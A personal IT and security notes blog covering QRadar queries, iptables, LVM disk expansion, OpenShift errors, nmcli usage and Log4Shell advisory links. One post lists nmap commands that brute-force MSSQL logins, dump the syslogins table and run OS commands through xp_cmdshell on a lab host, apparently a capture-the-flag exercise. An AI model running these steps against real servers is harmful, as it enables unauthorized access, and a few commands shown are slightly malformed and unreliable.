Wednesday, August 17, 2022

Get IP count stats for syslog traffic

 tcpdump -nns0 -i any -c 100000 dst port 514 |awk '{print $3}' |cut -d. -f1-4 |sort -V |uniq -c |sort -n

Tuesday, August 9, 2022

QRadar: snmpwalk: Failure in sendto (Operation not permitted)

[root@console snmp]# snmpwalk -Os -c public -v 2c 127.0.0.1:8001 iso.3.6.1.2.1.1.1
snmpwalk: Failure in sendto (Operation not permitted)



I solved it by changing port number to 8002 and with additional iptables rules.

# Default iptables rules block 8001 traffic.

[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT

# solution

[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT

[root@console ~]# iptables-save

QRadar: extract test steps of a specific offense rule

 /opt/qradar/support/extractRules.py -o QRadarRules.tsv 

# psql -t -A -U qradar -c "SELECT rule_data FROM custom_rule WHERE id=100311" | xmllint --xpath "//rule/testDefinitions/test/text" - | perl -MHTML::Entities -pe 'decode_entities($_);' |sed -e 's/<[^>]*>//g'

QRadar: Ariel query for getting related usernames in an offense

 AQL query:

SELECT username FROM events  WHERE INOFFENSE(ID) GROUP BY username

QRadar: Ariel query for getting related remote IPs in an offense

AQL query for getting remote ip addresses which is related with specific offense:

select distinct destinationip from events where INOFFENSE(633) TIMES OFFENSE_TIME(633) AND eventdirection IN ('L2R', 'R2R') 


Tuesday, August 2, 2022

nmap scripts for mssql servers

 nmap -p 1433 10.0.30.0/24

nmap --script ms-sql-info -p 1433 10.0.30.33

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.0.30.33

nmap -p 1433 --script ms-sql-empty-password 10.0.30.33

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.0.30.33 -oN output.txt
gvim output.txt

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.0.30.33

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" 10.0.30.33

QRadar SOAR: How to increase partition size by using a new disk on RHEL with LVM

 Steps:

Steps to add a new hard disk to LVM on IBM Security SOAR appliance running Red Hat Linux with LVM support:

1. In vSphere client, add a new hard disk at Virtual Device Node SCSI (0: 1).

2. SSH to the server.

3. Get the host bus number:
sudo grep mpt /sys/class/scsi_host/host?/proc_name
The response is similar to
/sys/class/scsi_host/host2/proc_name:mptspi

4. Rescan for new disks on host bus 2:
echo "- - -" > sudo /sys/class/scsi_host/host2/scan

5. Make sure new disk /dev/sdb is added to the system:
sudo fdisk -l

6. Create a new partition on /dev/sdb with file system type 8e (Linux LVM):
sudo fdisk /dev/sdb

=======
Command (m for help): n
Select (default p): p
Partition number (1-4, default 1): 1
First sector (a-b, default a): [Enter to use the default value]
Last sector, +sectors or +size{K,M,G} (a-b, default b): [Enter to use the default value]
Command (m for help): t
Hex code (type L to list all codes): 8e
Command (m for help): p
Command (m for help): w
=======

7. Create a physical volume for LVM:
sudo pvcreate /dev/sdb1

8. Get the volume group name (VG Name):
sudo vgdisplay

9. Extend the 'resilient' volume group by adding in the physical volume of /dev/sdb1:
sudo vgextend resilient /dev/sdb1

10. Scan all disks for physical volumes:
sudo pvscan

11. Check the volume group name (VG Name) again to make sure free space is added:
sudo vgdisplay

12. Display the path of the logical volume (LV Path):
sudo lvdisplay

The following assumes that you want to split the new disk over the three logical volumes.

13. Extend the logical volume for multiple logical volumes:
sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3

The previous commands allocate 80% of the extended space to "/dev/resilient/root" LVM, and then allocate the rest 20% to "/dev/resilient/co3" LVM.

14. Display the disk space usage to ensure new space is added:
sudo df -h

 

 

Reference:

 https://www.ibm.com/support/pages/node/1160644

Thursday, January 27, 2022

ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":

 Problem:

..

DEBUG vsphere_tag_category.category: Creation complete after 0s [id=urn:vmomi:InventoryServiceCategory:f49160e4-a017-404f-9ecf-88b93e02f300:GLOBAL]
DEBUG vsphere_tag.tag: Creating...                 
DEBUG vsphere_tag.tag: Creation complete after 0s [id=urn:vmomi:InventoryServiceTag:75e6da39-1493-4760-a360-5708375c1e49:GLOBAL]
DEBUG vsphereprivate_import_ova.import: Creating...
ERROR                                              
ERROR Error: failed to find provided vSphere objects: failed to find a host in the cluster that contains the provided datastore
ERROR                                              
ERROR   on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
ERROR   44: resource "vsphereprivate_import_ova" "import" {
ERROR                                              
ERROR                                              
FATAL failed to fetch Cluster: failed to generate asset "Cluster": failed to create cluster: failed to apply Terraform: failed to complete the change

..

Root cause of the problem:

This issue was caused by trying to use a datastore that was not shared storage on a cluster with multiple hypervisors.

 

Sunday, January 23, 2022

Saturday, January 22, 2022

Bulma.io: the modern CSS framework that just works.

 Bulma is a free, open source framework that provides ready-to-use frontend components that you can easily combine to build responsive web interfaces.

 https://bulma.io/

Themes:

https://jenil.github.io/bulmaswatch/


Friday, December 31, 2021

libera.chat: new irc environment for opensource communities

In the past I was using Freenode IRC server for getting support from open-source communities. After freenode I saw that some important communities moved this environment. I want to share details with you.

Server address:
/server irc.libera.chat 6667


You can connect with an irc client. IRC client suggestion: hexchat

Stats:

Saturday, December 11, 2021

CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)

 Plugin:

https://www.tenable.com/plugins/nessus/155999

 POC - Blog post:

https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability

Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package

Who is impacted?​

Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

https://www.lunasec.io/docs/blog/log4j-zero-day/


X-Force Report URL:

https://exchange.xforce.ibmcloud.com/collection/Log4Shell-Zero-Day-Targeting-Java-Package-4daa3df4f73a51590efced7fb90bc949

netmiko: Multi-vendor network device library for python

 github.com/ktbyers/netmiko Multi-vendor library to simplify CLI connections to network devices; can be helpful espacially for SOAR projects

Create bootable Windows 11 iso on Ubuntu 20.04

 ❯ sudo dd bs=4M if=/mnt/hgfs/Ddd/Win11_English_x64v1.iso of=/dev/sdc conv=fdatasync  status=progress

Friday, October 8, 2021

Red Hat: nmcli kullanım notları

 

Aşağıdaki testler Red Hat Enterprise Linux 8.2 üzerinde gerçekleştirilmiştir.

nmcli linux sistemler üzerinde NetworkManager servisi üzerinden ağ ayarlarını komut satırı kullanarak kontrol edebileceğiniz kullanabileceğiniz bir araçtır.

Aktif profili görüntüle:

#nmcli con show

Yeni bir profil tanımla:
Profil tanımlarken kullanabileceğiniz parametrelerden bazıları: con-name,ifname,type,ipv4.address,ipv4.gateway

#nmcli con add con-name lab ifname eth0 type ethernet ipv4.method manual ipv4.address 172.25.250.11/24 ipv4.gateway

Profil güncelle:
Profil güncellerken kullanabileceğiniz parametrelerden bazıları:
connection.autoconnect,ipv4.dns,+ipv4.addresses

#nmcli con mod lab ipv4.dns 4.2.2.4
#nmcli con mod lab connection.autoconnect
#nmcli con mod lab +ipv4.addresses 10.1.1.1/24